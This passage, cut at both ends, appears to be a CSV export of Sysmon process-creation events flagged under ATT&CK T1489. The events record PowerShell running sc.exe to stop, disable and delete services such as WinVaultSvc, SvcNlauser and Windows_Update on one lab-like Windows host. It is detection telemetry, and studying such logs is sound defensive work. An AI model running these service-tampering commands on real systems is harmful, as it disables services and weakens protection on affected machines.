MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Xtfy",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.091265800Z"",""eventRecordID"":""2702"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.089\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010c8332100}\r\nProcessId: 1988\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Xtfy\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.089"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010c8332100}"",""processId"":""1988"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Xtfy"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.293",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.057 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-001000332100} +ProcessId: 3152 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfy +CurrentDirectory: C:\Users\John 
Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.062306900Z"",""eventRecordID"":""2701"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.057\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-001000332100}\r\nProcessId: 3152\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.057"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-001000332100}"",""processId"":""3152"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfy"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.245",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.996 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-001033302100} +ProcessId: 6200 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) 
+Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinVaultSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.000018600Z"",""eventRecordID"":""2698"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.996\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-001033302100}\r\nProcessId: 6200\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.996"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-001033302100}"",""processId"":""6200"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinVaultSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.197",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.935 
+ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010552d2100} +ProcessId: 7660 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SvcNlauser +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.937028500Z"",""eventRecordID"":""2695"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.935\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010552d2100}\r\nProcessId: 7660\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.935"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010552d2100}"",""processId"":""7660"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", 
+"May 29, 2020 @ 14:18:59.183",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.919 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-00108c2c2100} +ProcessId: 6192 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config SvcNlauser Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config SvcNlauser Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.921665300Z"",""eventRecordID"":""2694"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.919\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-00108c2c2100}\r\nProcessId: 6192\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 
(WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config SvcNlauser Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.919"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-00108c2c2100}"",""processId"":""6192"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config SvcNlauser Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.151",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.892 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010fe2a2100} +ProcessId: 1820 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Windows Managers"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows 
Managers\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.894248200Z"",""eventRecordID"":""2692"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.892\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010fe2a2100}\r\nProcessId: 1820\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.892"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010fe2a2100}"",""processId"":""1820"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Windows Managers\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.109",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.851 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010a7282100} +ProcessId: 6324 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Windows_Update +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
